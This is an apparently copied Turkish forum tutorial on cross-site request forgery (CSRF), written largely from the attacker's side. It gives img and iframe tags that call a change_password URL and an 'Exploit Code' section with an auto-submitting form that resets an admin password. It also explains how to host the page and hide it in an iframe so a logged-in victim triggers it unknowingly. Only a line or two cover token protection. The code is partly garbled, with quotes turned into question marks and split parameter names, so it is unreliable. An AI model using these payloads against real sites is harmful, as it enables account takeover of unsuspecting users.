Selamun aleyküm Arkadaslar Csrf Hakkında Bilgiler ;
Cross Site Request Forgery (Diğer Adlarıyla Xsrf, Csrf, Ve Cross Site Reference Forgery) Browserlerın Javascript Çalıştırma Desteğiyle Kişilere İstenilenin Dışında Servera Komut Yollanmasını Sağlayan Kodlardır. Sitemiz Veya Sistemimiz Bu Komutlar İçin Genel Olarak Url Lerden Yararlanır.
Https://Www.domain.Com/Management/Ch…die&Submited=1
Biz de Bunu Bildiğimiz İçin Bundan Yararlanıcaz Veya Formlar Oluşturarak İşlemimizi Gerçekleştireceğiz. Zaten Amacımız da Bu İşlemleri Gerçekleştirebilecek Yetkiye Sahip Kişileri Oturum Açmış Durumdayken Kullanarak Onlar Yerine Kendi Kodlarımızı Güvenilir Kodlarmış Gibi Kullanıcıyı Kullanarak Göndermektir.
Ve Bu Saldırıları Html Veya Javascript Kodları Kullanarak İşlemesini Sağlayabiliriz.
<İmg Src="Https://Www.Domain.Com/Management/Change_Password.Php?New_Pass=Scriptkiddie&Verify_P ass=Scriptkiddie&Submited=1">
Saldırı Şekilleri 1 :
Saldırganımız Önceden Saldırı İçin Hazırladığı Sitemizi Kurbana Yollar Kurban Gezerken Kurbanın Domain Sitesinde İşlem Yapması İçin Ya Bir Teşvikte Bulunabilir Saldırganımız, Online Olduğu Bir Zamanı Seçebilir Ya Da Kurbanın İşi Çıkıp Girebilir Girdiği Anda Online Olduğu İçin Yani Çevirim İçi Sitenin Kod Kısmına Yerleştirilmiş Olan
, <İframe Src="Https://Www.Domain.Com/Management/Change_Password.Php?New_Pass=Scriptkiddie&Verify_P ass=Scriptkiddie&Submited=1">
Gibi Html Kodları Veya Formlarla (Javascript İle) Saldırganımız Kendi Adına Kişinin Servera Kodları Yollamasını Sağlar.
*** Örneğin Hedef Sitenizin Kaynağına Baktığınızda Session (Oturum) veya
<İnput Type="Hidden">
<İnput Type="Hidden" Name="Token" Value="".$_Sessıon["Token"].?" />
Kodları İle Korunmamışsa Csrf Olma Olasılığı Yüksektir.Tabiki Değişik Korunma Yöntemleride Vardır Fakat Ben Dilimin Döndüğünce Anlatmaya Çalışacağım Sizlere.
Panelimizde Bulunan Bir Csrf İle Saldırganın Neler Yapabileceğini Gösterim.
Exploit Code :
<İnput Type=?Password? Name=?Pass? Class=?Textinput? Value=?">
<İnput Type=?Password? Name=?Pass_Rep? Class=?Textinput? Value=?">
<İnput Type=?Hidden? Name=?Uaction? Value=?Update_Pass?>
<İnput Type=?Hidden? Name=?Submit? Value=?Update Password?>
Panelimizde Bulunan Kodlar Bunlar Olsun Ve Düzenleyelim Hemen Javascript Kodları İle Ve Html Olarak Kaydedelim. Hedef Kişiye İster Link Olarak İsterse Bir Site Arka Sayfasında ( İframe ) Çalıştırarak Adminin Yeni Şifresini Belirleyebilirsiniz.
Exploitimizin Düzenli Hali Şöle Olucak :
Function Scriptkiddie(){
Document.Forms[0].Submit();
}
<İnput Type=?Password? Name=?Pass? Class=?Textinput? Value=?Yeni Şifre Buraya?>
<İnput Type=?Password? Name=?Pass_Rep? Class=?Textinput? Value=?Yeni Şifre Buraya?>
<İnput Type=?Hidden? Name=?Uaction? Value=?Update_Pass?>
<İnput Type=?Hidden? Name=?Submit? Value=?Update Password?>
Saldırı Yapmak İsteyen Şahıs Sizlere İframe Kodları İle Yedirmeyede Çalışır. Nasıl Mı?
Exploiti Hedef. Html Adına Kayıt Eder Ve Kendi Sitesi Yada Senin İlgi Duyacağın Bir Sİtenin Ftp?sine Atar Ve Ana Sayfasından İframe Kodu İle Çağırır Sen Tıkladığında Farkında Olmadan Baktığın Ana Sayfanın Arkasındaki Kodlar Çoktan Çalışmış Olacaktır.
http://skaracan.com/csrf-xsrf-nedir-tespiti-uygulanmasi-ve-korunma-yollari.html